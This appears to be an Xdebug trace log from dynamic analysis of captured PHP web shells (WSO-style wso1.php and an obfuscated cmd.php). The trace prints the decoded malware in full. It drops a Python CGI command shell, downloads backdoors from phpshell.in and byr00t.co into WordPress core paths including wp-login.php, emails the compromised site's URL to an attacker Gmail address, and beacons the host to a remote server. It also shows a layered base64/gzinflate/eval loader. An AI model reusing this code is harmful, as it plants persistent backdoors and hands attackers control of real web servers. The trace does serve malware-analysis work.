RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n' /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code 1 0
4 13 0 0.008384 1144192 base64_decode 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4 13 1 0.008407 1144280
4 13 R 'http://byr00t.co/l-'
4 14 0 0.008424 1144248 GetIP 1 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 16 0
5 15 0 0.008438 1144248 getenv 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP'
5 15 1 0.008457 1144280
5 15 R FALSE
5 16 0 0.008471 1144248 getenv 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR'
5 16 1 0.008498 1144280
5 16 R FALSE
5 17 0 0.008512 1144248 getenv 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR'
5 17 1 0.008527 1144320
5 17 R '127.0.0.1'
4 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1'
4 14 1 0.008608 1144288
4 14 R '127.0.0.1'
4 18 0 0.008625 1144328 base64_encode 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/wso1.php.suspected'
4 18 1 0.008641 1144456
4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4 19 0 0.008677 1144320 function_exists 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init'
4 19 1 0.008693 1144360
4 19 R TRUE
4 20 0 0.008706 1144320 curl_init 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 0
4 20 1 0.008730 1145232
4 20 R resource(3) of type (curl)
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl)
4 21 0 0.008759 1145232 curl_setopt 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4 21 1 0.008781 1145328
4 21 R TRUE
4 22 0 0.008794 1145232 curl_setopt 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE
4 22 1 0.008811 1145328
4 22 R TRUE
4 23 0 0.008823 1145232 curl_exec 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 23 1 0.053580 1145264
4 23 R ''
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 $gitt = ''
4 24 0 0.053648 1145232 curl_close 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 24 1 0.053716 1144376
4 24 R NULL
4 25 0 0.053734 1144344 file_get_contents 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4 25 1 0.916635 1148056
4 25 R ''
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 21 $gitt = ''
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66'
3 A /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan'
4 26 0 0.916740 1148016 define 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code'
4 26 1 0.916759 1148120
4 26 R TRUE
4 27 0 0.916774 1148048 strpos 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google'
4 27 1 0.916791 1148120
4 27 R FALSE
4 28 0 0.916804 1148048 session_start 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 32 0
4 28 1 0.916898 1148800
4 28 R TRUE
4 29 0 0.916913 1148800 error_reporting 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 33 1 0
4 29 1 0.916927 1148840
4 29 R 0
4 30 0 0.916940 1148800 ini_set 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL
4 30 1 0.916956 1148872
4 30 R ''
4 31 0 0.916969 1148800 ini_set 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0
4 31 1 0.916984 1148872
4 31 R ''
4 32 0 0.916996 1148800 ini_set 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0
4 32 1 0.917010 1148872
4 32 R '1'
4 33 0 0.917022 1148800 ini_set 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0
4 33 1 0.917037 1148904
4 33 R '30'
4 34 0 0.917050 1148800 set_time_limit 0 /var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code 38 1 0
4 34 1 0.917064 1148864
4 34 R FALSE
3 12 1 0.917086 1150312
2 7 1 0.917105 1063288
1 3 1 0.917112 1061712
1 35 0 0.917119 1061744 Error->__toString 0 Unknown 0 0
2 36 0 0.917131 1061824 Error->getTraceAsString 0 Unknown 0 0
2 36 1 0.917143 1062080
2 36 R '#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
1 35 1 0.917162 1066216
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
0.917214 986664
TRACE END [2023-02-12 20:09:38.328391]
data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249133.7685.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:45:59.666336]
1 0 1 0.000148 393512
1 3 0 0.000376 426920 {main} 1 /var/www/html/uploads/cmd.php 0 0
1 A /var/www/html/uploads/cmd.php 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1 A /var/www/html/uploads/cmd.php 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2 4 0 0.000456 426920 base64_decode 0 /var/www/html/uploads/cmd.php 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000476 427080
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000497 427048 gzinflate 0 /var/www/html/uploads/cmd.php 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000519 427176
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000537 427016 htmlspecialchars_decode 0 /var/www/html/uploads/cmd.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000553 427048
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000582 428576 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/cmd.php 4 0
3 8 0 0.000597 428576 strrev 0 /var/www/html/uploads/cmd.php(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3 8 1 0.000650 461376
3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 0 0.000696 461344 base64_decode 0 /var/www/html/uploads/cmd.php(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 1 0.000811 494144
3 9 R '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 0 0.001257 461344 gzinflate 0 /var/www/html/uploads/cmd.php(4) : eval()'d code 1 1 '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 1 0.001737 485952
3 10 R 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
